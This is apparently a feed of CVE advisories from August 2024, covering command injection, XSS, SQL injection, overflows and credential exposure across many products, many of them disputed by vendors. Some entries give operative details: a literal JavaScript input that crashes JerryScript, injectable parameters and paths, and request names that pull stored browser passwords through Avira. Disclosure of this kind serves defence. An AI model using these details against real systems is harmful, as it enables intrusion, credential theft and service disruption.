🚨 CVE-2024-7470A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. It has been rated as critical. This issue affects the function sslvpn_config_mod of the file /vpn/vpn_template_style.php of the component Web Interface. The manipulation of the argument template/stylenum leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273563. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-05 04:37:24 |
🚨 CVE-2024-7469A vulnerability was found in Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90. It has been declared as critical. This vulnerability affects the function sslvpn_config_mod of the file /vpn/list_vpn_web_custom.php of the component Web Interface. The manipulation of the argument template/stylenum leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273562 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-05 03:37:33 |
🚨 CVE-2019-19372A downloadFile.php download_file path traversal vulnerability in rConfig through 3.9.3 allows attackers to list files in arbitrary folders and potentially download files. NOTE: the discoverer later reported that there was not a "fully working exploit.🎖@cveNotify |
|
| 2024-08-05 03:37:26 |
🚨 CVE-2019-1010025GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability.🎖@cveNotify |
|
| 2024-08-05 03:37:25 |
🚨 CVE-2019-1010023GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat.🎖@cveNotify |
|
| 2024-08-05 03:37:24 |
🚨 CVE-2019-1010022GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat.🎖@cveNotify |
|
| 2024-08-05 02:37:32 |
🚨 CVE-2019-17401libyal liblnk 20191006 has a heap-based buffer over-read in the network_share_name_offset>20 code block of liblnk_location_information_read_data in liblnk_location_information.c, a different issue than CVE-2019-17264. NOTE: the vendor has disputed this as described in the GitHub issue🎖@cveNotify |
|
| 2024-08-05 02:37:26 |
🚨 CVE-2019-17264In libyal liblnk before 20191006, liblnk_location_information_read_data in liblnk_location_information.c has a heap-based buffer over-read because an incorrect variable name is used for a certain offset. NOTE: the vendor has disputed this as described in the GitHub issue🎖@cveNotify |
|
| 2024-08-05 02:37:25 |
🚨 CVE-2019-16926Flower 0.9.3 has XSS via a crafted worker name. NOTE: The project author stated that he doesn't think this is a valid vulnerability. Worker name and task name aren’t user facing configuration options. They are internal backend config options and person having rights to change them already has full access🎖@cveNotify |
|
| 2024-08-05 02:37:24 |
🚨 CVE-2019-16925Flower 0.9.3 has XSS via the name parameter in an @app.task call. NOTE: The project author stated that he doesn't think this is a valid vulnerability. Worker name and task name aren’t user facing configuration options. They are internal backend config options and person having rights to change them already has full access🎖@cveNotify |
|
| 2024-08-05 01:37:32 |
🚨 CVE-2019-15562GORM before 1.9.10 allows SQL injection via incomplete parentheses. NOTE: Misusing Gorm by passing untrusted user input where Gorm expects trusted SQL fragments is a vulnerability in the application, not in Gorm🎖@cveNotify |
|
| 2024-08-05 01:37:26 |
🚨 CVE-2019-15045AjaxDomainServlet in Zoho ManageEngine ServiceDesk Plus 10 allows User Enumeration. NOTE: the vendor's position is that this is intended functionality🎖@cveNotify |
|
| 2024-08-05 01:37:25 |
🚨 CVE-2019-14771Backdrop CMS 1.12.x before 1.12.8 and 1.13.x before 1.13.3 allows the upload of entire-site configuration archives through the user interface or command line. It does not sufficiently check uploaded archives for invalid data, potentially allowing non-configuration scripts to be uploaded to the server. (This attack is mitigated by the attacker needing the "Synchronize, import, and export configuration" permission, a permission that only trusted administrators should be given. Other preventative measures in Backdrop CMS prevent the execution of PHP scripts, so another server-side scripting language must be accessible on the server to execute code.) Note: This has been disputed by multiple 3rd parties due to advanced permissions that are needed to exploit.🎖@cveNotify |
|
| 2024-08-05 01:37:24 |
🚨 CVE-2019-14441An issue was discovered in Libav 12.3. An access violation allows remote attackers to cause a denial of service (application crash), as demonstrated by avconv. This is related to ff_mpa_synth_filter_float in avcodec/mpegaudiodsp_template.c. NOTE: This may be a duplicate of CVE-2018-19129🎖@cveNotify |
|
| 2024-08-05 00:37:43 |
🚨 CVE-2019-13646Firefly III before 4.7.17.3 is vulnerable to reflected XSS due to lack of filtration of user-supplied data in a search query. NOTE: It is asserted that an attacker must have the same access rights as the user in order to be able to execute the vulnerability🎖@cveNotify |
|
| 2024-08-05 00:37:42 |
🚨 CVE-2019-13404The MSI installer for Python through 2.7.16 on Windows defaults to the C:\Python27 directory, which makes it easier for local users to deploy Trojan horse code. (This also affects old 3.x releases before 3.5.) NOTE: the vendor's position is that it is the user's responsibility to ensure C:\Python27 access control or choose a different directory, because backwards compatibility requires that C:\Python27 remain the default for 2.7.x🎖@cveNotify |
|
| 2024-08-05 00:37:37 |
🚨 CVE-2019-12928The QMP migrate command in QEMU version 4.0.0 and earlier is vulnerable to OS command injection, which allows the remote attacker to achieve code execution, denial of service, or information disclosure by sending a crafted QMP command to the listening server. Note: This has been disputed as a non-issue since QEMU's -qmp interface is meant to be used by trusted users. If one is able to access this interface via a tcp socket open to the internet, then it is an insecure configuration issue🎖@cveNotify |
|
| 2024-08-05 00:37:36 |
🚨 CVE-2019-12456An issue was discovered in the MPT3COMMAND case in _ctl_ioctl_main in drivers/scsi/mpt3sas/mpt3sas_ctl.c in the Linux kernel through 5.1.5. It allows local users to cause a denial of service or possibly have unspecified other impact by changing the value of ioc_number between two kernel reads of that value, aka a "double fetch" vulnerability. NOTE: a third party reports that this is unexploitable because the doubly fetched value is not used🎖@cveNotify |
|
| 2024-08-05 00:37:31 |
🚨 CVE-2019-12382An issue was discovered in drm_load_edid_firmware in drivers/gpu/drm/drm_edid_load.c in the Linux kernel through 5.1.5. There is an unchecked kstrdup of fwstr, which might allow an attacker to cause a denial of service (NULL pointer dereference and system crash). NOTE: The vendor disputes this issues as not being a vulnerability because kstrdup() returning NULL is handled sufficiently and there is no chance for a NULL pointer dereference🎖@cveNotify |
|
| 2024-08-05 00:37:30 |
🚨 CVE-2019-12379An issue was discovered in con_insert_unipair in drivers/tty/vt/consolemap.c in the Linux kernel through 5.1.5. There is a memory leak in a certain case of an ENOMEM outcome of kmalloc. NOTE: This id is disputed as not being an issue🎖@cveNotify |
|
| 2024-08-05 00:37:26 |
🚨 CVE-2019-12279Nagios XI 5.6.1 allows SQL injection via the username parameter to login.php?forgotpass (aka the reset password form). NOTE: The vendor disputes this issues as not being a vulnerability because the issue does not seem to be a legitimate SQL Injection. The POC does not show any valid injection that can be done with the variable provided, and while the username value being passed does get used in a SQL query, it is passed through SQL escaping functions when creating the call. The vendor tried re-creating the issue with no luck🎖@cveNotify |
|
| 2024-08-05 00:37:25 |
🚨 CVE-2019-12215A full path disclosure vulnerability was discovered in Matomo v3.9.1 where a user can trigger a particular error to discover the full path of Matomo on the disk, because lastError.file is used in plugins/CorePluginsAdmin/templates/safemode.twig. NOTE: the vendor disputes the significance of this issue, stating "avoid reporting path disclosures, as we don't consider them as security vulnerabilities.🎖@cveNotify |
|
| 2024-08-04 23:37:25 |
🚨 CVE-2019-11191The Linux kernel through 5.0.7, when CONFIG_IA32_AOUT is enabled and ia32_aout is loaded, allows local users to bypass ASLR on setuid a.out programs (if any exist) because install_exec_creds() is called too late in load_aout_binary() in fs/binfmt_aout.c, and thus the ptrace_may_access() check has a race condition when reading /proc/pid/stat. NOTE: the software maintainer disputes that this is a vulnerability because ASLR for a.out format executables has never been supported🎖@cveNotify |
|
| 2024-08-04 23:37:24 |
🚨 CVE-2019-11072lighttpd before 1.4.54 has a signed integer overflow, which might allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a malicious HTTP GET request, as demonstrated by mishandling of /%2F? in burl_normalize_2F_to_slash_fix in burl.c. NOTE: The developer states "The feature which can be abused to cause the crash is a new feature in lighttpd 1.4.50, and is not enabled by default. It must be explicitly configured in the config file (e.g. lighttpd.conf). Certain input will trigger an abort() in lighttpd when that feature is enabled. lighttpd detects the underflow or realloc() will fail (in both 32-bit and 64-bit executables), also detected in lighttpd. Either triggers an explicit abort() by lighttpd. This is not exploitable beyond triggering the explicit abort() with subsequent application exit.🎖@cveNotify |
|
| 2024-08-04 22:37:32 |
🚨 CVE-2019-9675An issue was discovered in PHP 7.x before 7.1.27 and 7.3.x before 7.3.3. phar_tar_writeheaders_int in ext/phar/tar.c has a buffer overflow via a long link value. NOTE: The vendor indicates that the link value is used only when an archive contains a symlink, which currently cannot happen: "This issue allows theoretical compromise of security, but a practical attack is usually impossible.🎖@cveNotify |
|
| 2024-08-04 22:37:26 |
🚨 CVE-2019-9212SOFA-Hessian through 4.0.2 allows remote attackers to execute arbitrary commands via a crafted serialized Hessian object because blacklisting of com.caucho.naming.QName and com.sun.org.apache.xpath.internal.objects.XString is mishandled, related to Resin Gadget. NOTE: The vendor doesn’t consider this issue a vulnerability because the blacklist is being misused. SOFA Hessian supports custom blacklist and a disclaimer was posted encouraging users to update the blacklist or to use the whitelist feature for their specific needs since the blacklist is not being actively updated🎖@cveNotify |
|
| 2024-08-04 22:37:25 |
🚨 CVE-2019-9042An issue was discovered in Sitemagic CMS v4.4. In the index.php?SMExt=SMFiles URI, the user can upload a .php file to execute arbitrary code, as demonstrated by 404.php. This can only occur if the administrator neglects to set FileExtensionFilter and there are untrusted user accounts. NOTE: The maintainer states that this is not a vulnerability but a feature used in conjunction with External Modules🎖@cveNotify |
|
| 2024-08-04 22:37:24 |
🚨 CVE-2019-8341An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing🎖@cveNotify |
|
| 2024-08-04 21:37:25 |
🚨 CVE-2019-6446An issue was discovered in NumPy 1.16.0 and earlier. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) loading serialized Python object arrays from trusted and authenticated sources🎖@cveNotify |
|
| 2024-08-04 21:37:24 |
🚨 CVE-2019-6129png_create_info_struct in png.c in libpng 1.6.36 has a memory leak, as demonstrated by pngcp. NOTE: a third party has stated "I don't think it is libpng's job to free this buffer.🎖@cveNotify |
|
| 2024-08-04 18:37:32 |
🚨 CVE-2020-36617A vulnerability was found in ewxrjk sftpserver. It has been declared as problematic. Affected by this vulnerability is the function sftp_parse_path of the file parse.c. The manipulation leads to uninitialized pointer. The real existence of this vulnerability is still doubted at the moment. The name of the patch is bf4032f34832ee11d79aa60a226cc018e7ec5eed. It is recommended to apply a patch to fix this issue. The identifier VDB-216205 was assigned to this vulnerability. NOTE: In some deployment models this would be a vulnerability. README specifically warns about avoiding such deployment models.🎖@cveNotify |
|
| 2024-08-04 18:37:26 |
🚨 CVE-2020-36420Polipo through 1.1.1, when NDEBUG is omitted, allows denial of service via a reachable assertion during parsing of a malformed Range header. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 18:37:25 |
🚨 CVE-2020-36079Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder) portion of the UI. This can, for example, place a .php file in the server's uploaded/ directory. NOTE: the vendor disputes this because exploitation can only be performed by an admin who has "lots of other possibilities to harm a site.🎖@cveNotify |
|
| 2024-08-04 18:37:24 |
🚨 CVE-2020-35850An SSRF issue was discovered in cockpit-project.org Cockpit 234. NOTE: this is unrelated to the Agentejo Cockpit product. NOTE: the vendor states "I don't think [it] is a big real-life issue.🎖@cveNotify |
|
| 2024-08-04 17:37:44 |
🚨 CVE-2020-35720Stored XSS in Quest Policy Authority 8.1.2.200 allows remote attackers to store malicious code in multiple fields (first name, last name, and logon name) when creating or modifying a user via the submitUser.jsp file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 17:37:43 |
🚨 CVE-2020-35206Reflected XSS in Web Compliance Manager in Quest Policy Authority version 8.1.2.200 allows attackers to inject malicious code into the browser via a specially crafted link to the cConn.jsp file via the ur parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 17:37:42 |
🚨 CVE-2020-35205Server Side Request Forgery (SSRF) in Web Compliance Manager in Quest Policy Authority version 8.1.2.200 allows attackers to scan internal ports and make outbound connections via the initFile.jsp file. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 17:37:39 |
🚨 CVE-2020-35204Reflected XSS in Quest Policy Authority version 8.1.2.200 allows attackers to inject malicious code into the browser via a specially crafted link to the PolicyAuthority/Common/FolderControl.jsp file via the unqID parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 17:37:38 |
🚨 CVE-2020-35203Reflected XSS in Web Compliance Manager in Quest Policy Authority version 8.1.2.200 allows attackers to inject malicious code into the browser via a specially crafted link to the initFile.jsp file via the msg parameter. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 17:37:37 |
🚨 CVE-2020-28759The serializer module in OAID Tengine lite-v1.0 has a Buffer Overflow and crash. NOTE: another person has stated "I don't think there is an proof of overflow so far.🎖@cveNotify |
|
| 2024-08-04 17:37:36 |
🚨 CVE-2020-35702DCTStream::getChars in DCTStream.cc in Poppler 20.12.1 has a heap-based buffer overflow via a crafted PDF document. NOTE: later reports indicate that this only affects builds from Poppler git clones in late December 2020, not the 20.12.1 release. In this situation, it should NOT be considered a Poppler vulnerability. However, several third-party Open Source projects directly rely on Poppler git clones made at arbitrary times, and therefore the CVE remains useful to users of those projects🎖@cveNotify |
|
| 2024-08-04 17:37:32 |
🚨 CVE-2020-35457GNOME GLib before 2.65.3 has an integer overflow, that might lead to an out-of-bounds write, in g_option_group_add_entries. NOTE: the vendor's position is "Realistically this is not a security issue. The standard pattern is for callers to provide a static list of option entries in a fixed number of calls to g_option_group_add_entries()." The researcher states that this pattern is undocumented🎖@cveNotify |
|
| 2024-08-04 17:37:31 |
🚨 CVE-2020-35208An issue was discovered in the LogMein LastPass Password Manager (aka com.lastpass.ilastpass) app 4.8.11.2403 for iOS. The password authentication for unlocking can be bypassed by forcing the authentication result to be true through runtime manipulation. In other words, an attacker could authenticate with an arbitrary password. NOTE: the vendor has indicated that this is not an attack of interest within the context of their threat model, which excludes jailbroken devices🎖@cveNotify |
|
| 2024-08-04 17:37:30 |
🚨 CVE-2020-35207An issue was discovered in the LogMein LastPass Password Manager (aka com.lastpass.ilastpass) app 4.8.11.2403 for iOS. The PIN authentication for unlocking can be bypassed by forcing the authentication result to be true through runtime manipulation. In other words, an attacker could authenticate with an arbitrary PIN. NOTE: the vendor has indicated that this is not an attack of interest within the context of their threat model, which excludes jailbroken devices🎖@cveNotify |
|
| 2024-08-04 17:37:26 |
🚨 CVE-2020-28975svm_predict_values in svm.cpp in Libsvm v324, as used in scikit-learn 0.23.2 and other products, allows attackers to cause a denial of service (segmentation fault) via a crafted model SVM (introduced via pickle, json, or any other model permanence standard) with a large value in the _n_support array. NOTE: the scikit-learn vendor's position is that the behavior can only occur if the library's API is violated by an application that changes a private attribute.🎖@cveNotify |
|
| 2024-08-04 17:37:25 |
🚨 CVE-2020-28349An inaccurate frame deduplication process in ChirpStack Network Server 3.9.0 allows a malicious gateway to perform uplink Denial of Service via malformed frequency attributes in CollectAndCallOnceCollect in internal/uplink/collect.go. NOTE: the vendor's position is that there are no "guarantees that allowing untrusted LoRa gateways to the network should still result in a secure network.🎖@cveNotify |
|
| 2024-08-04 17:37:24 |
🚨 CVE-2020-27986SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it.🎖@cveNotify |
|
| 2024-08-04 16:37:44 |
🚨 CVE-2020-25902Blackboard Collaborate Ultra 20.02 is affected by a cross-site scripting (XSS) vulnerability. The XSS payload will execute on the class room, which leads to stealing cookies from users who join the class. NOTE: Third-parties dispute the validity of this entry as a possible false positive during research🎖@cveNotify |
|
| 2024-08-04 16:37:43 |
🚨 CVE-2020-25966Sectona Spectra before 3.4.0 has a vulnerable SOAP API endpoint that leaks sensitive information about the configured assets without proper authentication. This could be used by unauthorized parties to get configured login credentials of the assets via a modified pAccountID value. NOTE: The vendor has indicated this is not a vulnerability and states "This vulnerability occurred due to wrong configuration of system.🎖@cveNotify |
|
| 2024-08-04 16:37:42 |
🚨 CVE-2020-26561Belkin LINKSYS WRT160NL 1.0.04.002_US_20130619 devices have a stack-based buffer overflow vulnerability because of sprintf in create_dir in mini_httpd. Successful exploitation leads to arbitrary code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 16:37:38 |
🚨 CVE-2020-26546An issue was discovered in HelpDeskZ 1.0.2. The feature to auto-login a user, via the RememberMe functionality, is prone to SQL injection. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 16:37:37 |
🚨 CVE-2020-24807The socket.io-file package through 2.0.31 for Node.js relies on client-side validation of file types, which allows remote attackers to execute arbitrary code by uploading an executable file via a modified JSON name field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 16:37:36 |
🚨 CVE-2020-26574Leostream Connection Broker 8.2.x is affected by stored XSS. An unauthenticated attacker can inject arbitrary JavaScript code via the webquery.pl User-Agent HTTP header. It is rendered by the admins the next time they log in. The JavaScript injected can be used to force the admin to upload a malicious Perl script that will be executed as root via libMisc::browser_client. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 16:37:33 |
🚨 CVE-2020-25200Pritunl 1.29.2145.25 allows attackers to enumerate valid VPN usernames via a series of /auth/session login attempts. Initially, the server will return error 401. However, if the username is valid, then after 20 login attempts, the server will start responding with error 400. Invalid usernames will receive error 401 indefinitely. Note: This has been disputed by the vendor as not a vulnerability. They argue that this is an intended design🎖@cveNotify |
|
| 2024-08-04 16:37:32 |
🚨 CVE-2020-25821peg-markdown 0.4.14 has a NULL pointer dereference in process_raw_blocks in markdown_lib.c. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 16:37:31 |
🚨 CVE-2020-25786webinc/js/info.php on D-Link DIR-816L 2.06.B09_BETA and DIR-803 1.04.B02 devices allows XSS via the HTTP Referer header. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: this is typically not exploitable because of URL encoding (except in Internet Explorer) and because a web page cannot specify that a client should make an additional HTTP request with an arbitrary Referer header🎖@cveNotify |
|
| 2024-08-04 16:37:30 |
🚨 CVE-2020-25756A buffer overflow vulnerability exists in the mg_get_http_header function in Cesanta Mongoose 6.18 due to a lack of bounds checking. A crafted HTTP header can exploit this bug. NOTE: a committer has stated "this will not happen in practice.🎖@cveNotify |
|
| 2024-08-04 16:37:27 |
🚨 CVE-2020-25750An issue was discovered in DotPlant2 before 2020-09-14. In class Pay2PayPayment in payment/Pay2PayPayment.php, there is an XXE vulnerability in the checkResult function. The user input ($_POST['xml']) is used for simplexml_load_string without sanitization. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 16:37:26 |
🚨 CVE-2020-25071Nifty Project Management Web Application 2020-08-26 allows XSS, via Add Task, that is rendered upon a Project Home visit. Note: It has been argued that this is not reproducible. "The original issue was that the task would be created and an alert would be shown on the screen. Now the task would be created, but the alert won't be executed as those attributes are now stripped.🎖@cveNotify |
|
| 2024-08-04 16:37:25 |
🚨 CVE-2020-24567voidtools Everything before 1.4.1 Beta Nightly 2020-08-18 allows privilege escalation via a Trojan horse urlmon.dll file in the installation directory. NOTE: this is only relevant if low-privileged users can write to the installation directory, which may be considered a site-specific configuration error🎖@cveNotify |
|
| 2024-08-04 15:37:37 |
🚨 CVE-2020-24165An issue was discovered in TCG Accelerator in QEMU 4.2.0, allows local attackers to execute arbitrary code, escalate privileges, and cause a denial of service (DoS). Note: This is disputed as a bug and not a valid security issue by multiple third parties.🎖@cveNotify |
|
| 2024-08-04 15:37:36 |
🚨 CVE-2020-22916An issue discovered in XZ 5.2.5 allows attackers to cause a denial of service via decompression of a crafted file. NOTE: the vendor disputes the claims of "endless output" and "denial of service" because decompression of the 17,486 bytes always results in 114,881,179 bytes, which is often a reasonable size increase.🎖@cveNotify |
|
| 2024-08-04 15:37:35 |
🚨 CVE-2020-21469An issue was discovered in PostgreSQL 12.2 allows attackers to cause a denial of service via repeatedly sending SIGHUP signals. NOTE: this is disputed by the vendor because untrusted users cannot send SIGHUP signals; they can only be sent by a PostgreSQL superuser, a user with pg_reload_conf access, or a user with sufficient privileges at the OS level (the postgres account or the root account).🎖@cveNotify |
|
| 2024-08-04 15:37:32 |
🚨 CVE-2020-19909Integer overflow vulnerability in tool_operate.c in curl 7.65.2 via a large value as the retry delay. NOTE: many parties report that this has no direct security impact on the curl user; however, it may (in theory) cause a denial of service to associated systems or networks if, for example, --retry-delay is misinterpreted as a value much smaller than what was intended. This is not especially plausible because the overflow only happens if the user was trying to specify that curl should wait weeks (or longer) before trying to recover from a transient error.🎖@cveNotify |
|
| 2024-08-04 15:37:31 |
🚨 CVE-2020-23904A stack buffer overflow in speexenc.c of Speex v1.2 allows attackers to cause a denial of service (DoS) via a crafted WAV file. NOTE: the vendor states "I cannot reproduce it" and it "is a demo program.🎖@cveNotify |
|
| 2024-08-04 15:37:30 |
🚨 CVE-2020-21468A segmentation fault in the redis-server component of Redis 5.0.7 leads to a denial of service (DOS). NOTE: the vendor cannot reproduce this issue in a released version, such as 5.0.7🎖@cveNotify |
|
| 2024-08-04 15:37:26 |
🚨 CVE-2020-23826The Yale WIPC-303W 2.21 through 2.31 camera is vulnerable to remote command execution (RCE) through command injection via the HTTP API. NOTE: This may be a duplicate of CVE-2020-10176🎖@cveNotify |
|
| 2024-08-04 15:37:25 |
🚨 CVE-2020-22278phpMyAdmin through 5.0.2 allows CSV injection via Export Section. NOTE: the vendor disputes this because "the CSV file is accurately generated based on the database contents.🎖@cveNotify |
|
| 2024-08-04 15:37:24 |
🚨 CVE-2020-24345JerryScript through 2.3.0 allows stack consumption via function a(){new new Proxy(a,{})}JSON.parse("[]",a). NOTE: the vendor states that the problem is the lack of the --stack-limit option🎖@cveNotify |
|
| 2024-08-04 14:37:43 |
🚨 CVE-2020-18900A heap-based buffer overflow in the libexe_io_handle_read_coff_optional_header function of libyal libexe before 20181128. NOTE: the vendor has disputed this as described in libyal/libexe issue 1 on GitHub🎖@cveNotify |
|
| 2024-08-04 14:37:42 |
🚨 CVE-2020-18171TechSmith Snagit 19.1.0.2653 uses Object Linking and Embedding (OLE) which can allow attackers to obfuscate and embed crafted files used to escalate privileges. NOTE: This implies that Snagit's use of OLE is a security vulnerability unto itself and it is not. See reference document for more details🎖@cveNotify |
|
| 2024-08-04 14:37:41 |
🚨 CVE-2020-18169A vulnerability in the Windows installer XML (WiX) toolset of TechSmith Snagit 19.1.1.2860 allows attackers to escalate privileges. NOTE: Exploit of the Snagit installer would require the end user to ignore other safety mechanisms provided by the Host OS. See reference document for more details🎖@cveNotify |
|
| 2024-08-04 14:37:38 |
🚨 CVE-2020-15501Smarter Coffee Maker before 2nd generation allows firmware replacement without authentication or authorization. User interaction is required to press a button. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 14:37:37 |
🚨 CVE-2020-16139A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information🎖@cveNotify |
|
| 2024-08-04 14:37:36 |
🚨 CVE-2020-16137A privilege escalation issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to reset the credentials for the SSH administrative console to arbitrary values. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information🎖@cveNotify |
|
| 2024-08-04 14:37:32 |
🚨 CVE-2020-17361An issue was discovered in ReadyTalk Avian 1.2.0. The vm::arrayCopy method defined in classpath-common.h returns silently when a negative length is provided (instead of throwing an exception). This could result in data being lost during the copy, with varying consequences depending on the subsequent use of the destination buffer. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 14:37:31 |
🚨 CVE-2020-16248Prometheus Blackbox Exporter through 0.17.0 allows /probe?target= SSRF. NOTE: follow-on discussion suggests that this might plausibly be interpreted as both intended functionality and also a vulnerability🎖@cveNotify |
|
| 2024-08-04 14:37:30 |
🚨 CVE-2020-16163An issue was discovered in RIPE NCC RPKI Validator 3.x before 3.1-2020.07.06.14.28. RRDP fetches proceed even with a lack of validation of a TLS HTTPS endpoint. This allows remote attackers to bypass intended access restrictions, or to trigger denial of service to traffic directed to co-dependent routing systems. NOTE: third parties assert that the behavior is intentionally permitted by RFC 8182🎖@cveNotify |
|
| 2024-08-04 14:37:26 |
🚨 CVE-2020-15778scp in OpenSSH through 8.3p1 allows command injection in the scp.c toremote function, as demonstrated by backtick characters in the destination argument. NOTE: the vendor reportedly has stated that they intentionally omit validation of "anomalous argument transfers" because that could "stand a great chance of breaking existing workflows."🎖@cveNotify |
|
| 2024-08-04 14:37:25 |
🚨 CVE-2020-15497jcore/portal/ajaxPortal.jsp in Jalios JCMS 10.0.2 build-20200224104759 allows XSS via the types parameter. Note: It is asserted that this vulnerability is not present in the standard installation of Jalios JCMS🎖@cveNotify |
|
| 2024-08-04 14:37:24 |
🚨 CVE-2020-15502The DuckDuckGo application through 5.58.0 for Android, and through 7.47.1.0 for iOS, sends hostnames of visited web sites within HTTPS .ico requests to servers in the duckduckgo.com domain, which might make visit data available temporarily at a Potentially Unwanted Endpoint. NOTE: the vendor has stated "the favicon service adheres to our strict privacy policy.🎖@cveNotify |
|
| 2024-08-04 13:37:32 |
🚨 CVE-2024-35143IBM Planning Analytics Local 2.0 and 2.1 connects to a MongoDB server. MongoDB, a document-oriented database system, is listening on the remote port, and it is configured to allow connections without password authentication. A remote attacker can gain unauthorized access to the database. IBM X-Force ID: 292420.🎖@cveNotify |
|
| 2024-08-04 13:37:31 |
🚨 CVE-2020-14933compose.php in SquirrelMail 1.4.22 calls unserialize for the $attachments value, which originates from an HTTP POST request. NOTE: the vendor disputes this because these two conditions for PHP object injection are not satisfied: existence of a PHP magic method (such as __wakeup or __destruct), and any attack-relevant classes must be declared before unserialize is called (or must be autoloaded).🎖@cveNotify |
|
| 2024-08-04 13:37:30 |
🚨 CVE-2020-14400An issue was discovered in LibVNCServer before 0.9.13. Byte-aligned data is accessed through uint16_t pointers in libvncserver/translate.c. NOTE: Third parties do not consider this to be a vulnerability as there is no known path of exploitation or cross of a trust boundary🎖@cveNotify |
|
| 2024-08-04 13:37:26 |
🚨 CVE-2020-13998Citrix XenApp 6.5, when 2FA is enabled, allows a remote unauthenticated attacker to ascertain whether a user exists on the server, because the 2FA error page only occurs after a valid username is entered. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-08-04 13:37:25 |
🚨 CVE-2020-13978Monstra CMS 3.0.4 allows an attacker, who already has administrative access to modify .chunk.php files on the Edit Chunk screen, to execute arbitrary OS commands via the Theme Module by visiting the admin/index.php?id=themes&action=edit_chunk URI. NOTE: there is no indication that the Edit Chunk feature was intended to prevent an administrator from using PHP's exec feature🎖@cveNotify |
|
| 2024-08-04 13:37:24 |
🚨 CVE-2020-13976An issue was discovered in DD-WRT through 16214. The Diagnostic page allows remote attackers to execute arbitrary commands via shell metacharacters in the host field of the ping command. Exploitation through CSRF might be possible. NOTE: software maintainers consider the report invalid because it refers to an old software version, requires administrative privileges, and does not provide access beyond that already available to administrative users🎖@cveNotify |
|
| 2024-08-04 12:37:41 |
🚨 CVE-2020-12680Avira Free Antivirus through 15.0.2005.1866 allows local users to discover user credentials. The functions of the executable file Avira.PWM.NativeMessaging.exe are aimed at collecting credentials stored in Chrome, Firefox, Opera, and Edge. The executable does not verify the calling program and thus a request such as fetchChromePasswords or fetchCredentials will succeed. NOTE: some third parties have stated that this is "not a vulnerability.🎖@cveNotify |
|
| 2024-08-04 12:37:40 |
🚨 CVE-2020-12270React Native Bluetooth Scan in Bluezone 1.0.0 uses six-character alphanumeric IDs, which might make it easier for remote attackers to interfere with COVID-19 contact tracing by using many IDs. NOTE: the vendor disputes the relevance of this report because the recipient of an F1 alert will know it was a false alert if contact-history comparison fails (i.e., an F0 is not actually part of the contact history obtained from the device of this recipient, or this recipient is not actually part of the contact history obtained from the device of an F0)🎖@cveNotify |
|
| 2024-08-04 12:37:36 |
